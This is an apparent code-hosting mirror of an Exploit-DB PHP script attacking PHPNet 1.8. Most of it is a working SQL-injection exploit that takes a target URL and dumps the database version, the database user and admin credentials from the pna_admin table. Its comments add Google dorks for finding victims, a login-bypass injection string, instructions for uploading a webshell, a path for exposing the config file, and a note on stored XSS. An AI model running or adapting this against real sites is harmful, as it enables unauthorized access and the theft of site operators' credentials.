PageRenderTime 60ms CodeModel.GetById 24ms RepoModel.GetById 0ms app.codeStats 0ms

/exploits/php/webapps/19007.php

https://bitbucket.org/DinoRex99/exploit-database
PHP | 126 lines | 77 code | 7 blank | 42 comment | 3 complexity | 2d4c4d0ed627482fa49048faf6186469 MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. <?php 

    2. 

  2. # Exploit Title: PHPNet <= 1.8 (ler.php) SQL Injection

    3. 

  3. # Exploit Author: WhiteCollarGroup

    4. 

  4. # Date: 06th 06 2012

    5. 

  5. # Vendor homepage: http://www.phpnet.com.br/

    6. 

  6. # Software Link: http://phpbrasil.com/script/Wb03ErMczAho/phpnetartigos

    7. 

  7. # Google Dork: intext:"Powerd by Nielson Rocha"

    8. 

  8. # Google Dork: inurl:"ler.php?id=" intext:"Voltar - Imprimir"

    9. 

  9. # Version: 1.8

    10. 

  10. # Tested on: Debian GNU/Linux,Windows 7 Ultimate

    11. 

  11. 

    12. 

  12. /*

    13. 

  13. We discovered multiple vulnerabilities on the system.

    14. 

  14. 

    15. 

  15.   ~> SQL Injection

    16. 

  16. This exploit is for a vulnerability in ler.php, but are the same vulnerability on imprimir.php and imagem.php.

    17. 

  17. ler.php?id=[SQLi]

    18. 

  18. imprimir.php?id=[SQLi]

    19. 

  19. imagem.php?id=[SQLi]

    20. 

  20. 

    21. 

  21. Usage:

    22. 

  22. php file.php http://server/path/

    23. 

  23. 

    24. 

  24.   ~> Login bypass

    25. 

  25. In login page, you can bypass the login using "SQLi strings".

    26. 

  26. Go to http://server/path/admin/login.php

    27. 

  27. 

    28. 

  28. Login: ' or 1=1-- wc

    29. 

  29. Pass: wcgroup

    30. 

  30. 

    31. 

  31.   ~> Arbitraty File Upload

    32. 

  32.   After open administration panel, try to add a new article.

    33. 

  33.   Use the upload form to upload your webshell.

    34. 

  34.   After posting, access:

    35. 

  35.   http://server/path/tmp/your_shell_filename.php

    36. 

  36.   

    37. 

  37.   ~> Information disclosure

    38. 

  38.   Access:

    39. 

  39.   http://server/path/conf/config.ini

    40. 

  40.   

    41. 

  41.   ~> XSS Stored (persistent)

    42. 

  42.   When posting a new article, you can post (D)HTML/Javascript codes on the page.

    43. 

  43.   

    44. 

  44. */

    45. 

  45.  

    46. 

  46. function _printf($str) {

    47. 

  47.     echo $str."\n";

    48. 

  48. }

    49. 

  49. 

    50. 

  50. function hex($string){

    51. 

  51.     $hex=''; // PHP 'Dim' =]

    52. 

  52.     for ($i=0; $i < strlen($string); $i++){

    53. 

  53.         $hex .= dechex(ord($string[$i]));

    54. 

  54.     }

    55. 

  55.     return '0x'.$hex;

    56. 

  56. }

    57. 

  57. 

    58. 

  58. set_time_limit(0);

    59. 

  59. error_reporting(E_ERROR & E_USER_WARNING);

    60. 

  60. @ini_set('default_socket_timeout', 30);

    61. 

  61. echo "\n";

    62. 

  62.  

    63. 

  63. echo "PHPNet <= 1.8 SQLi Exploit\n";

    64. 

  64. echo "Discovered by WhiteCollarGroup\n";

    65. 

  65. echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com";

    66. 

  66. if($argc!=2) {

    67. 

  67.     _printf("Usage:");

    68. 

  68.     _printf("php $argv[0] <target>");

    69. 

  69.     _printf("Example:");

    70. 

  70.     _printf("php $argv[0] http://site.com/path/");

    71. 

  71.     exit;

    72. 

  72. }

    73. 

  73. 

    74. 

  74. $target = $argv[1];

    75. 

  75. if(substr($target, (strlen($target)-1))!="/") { // se o ultimo caractere nao for uma barra

    76. 

  76.     $target .= "/"; 

    77. 

  77. }

    78. 

  78. 

    79. 

  79. $inject = $target . "ler.php?id=-0'%20"; 

    80. 

  80. 

    81. 

  81. $token = uniqid();

    82. 

  82. $token_hex = hex($token);

    83. 

  83. 

    84. 

  84. // vamos agora obter os seguintes dados: user() version()

    85. 

  85. echo "\n\n[*] Trying to get informations...\n";

    86. 

  86. 

    87. 

  87. $infos = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",version(),".$token_hex.",user(),".$token_hex."),6,7,8-- "));

    88. 

  88. $infos_r = array();

    89. 

  89. preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r);

    90. 

  90. $user = $infos_r[1][0];

    91. 

  91. $version = $infos_r[2][0];

    92. 

  92. if(($user) AND ($version)) 

    93. 

  93. {

    94. 

  94.     echo "[!] MySQL user: $user\n";

    95. 

  95.     echo "[!] MySQL version: $version\n";

    96. 

  96. } 

    97. 

  97. else

    98. 

  98. {

    99. 

  99.     echo "[-] Error while getting informations...\n";

    100. 

  100. }

    101. 

  101. 

    102. 

  102. $i = 0;

    103. 

  103. while(1==1) {

    104. 

  104.     $dados_r = array();

    105. 

  105.     $dados = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",admin_user,".$token_hex.",admin_pass,".$token_hex."),6,7,8 from pna_admin limit $i,1-- "));

    106. 

  106.     preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r);

    107. 

  107.     $login = $dados_r[1][0];

    108. 

  108.     $senha = $dados_r[2][0];

    109. 

  109.     if(($login) AND ($senha)) {

    110. 

  110.         echo "    -+-\n";

    111. 

  111.         echo "[!] User: $login\n";

    112. 

  112.         echo "[!] Pass: $senha\n";

    113. 

  113.         $i++;

    114. 

  114.     } else {

    115. 

  115.         break; // exitloop

    116. 

  116.     }

    117. 

  117.     

    118. 

  118.     if($i==0) {

    119. 

  119.         echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry.";

    120. 

  120.     } else {

    121. 

  121. 		echo "    -+-\n[!] :D";

    122. 

  122. 	}

    123. 

  123. 	echo "\n";

    124. 

  124. }

    125. 

  125. 

    126. 

  126. ?>
    127.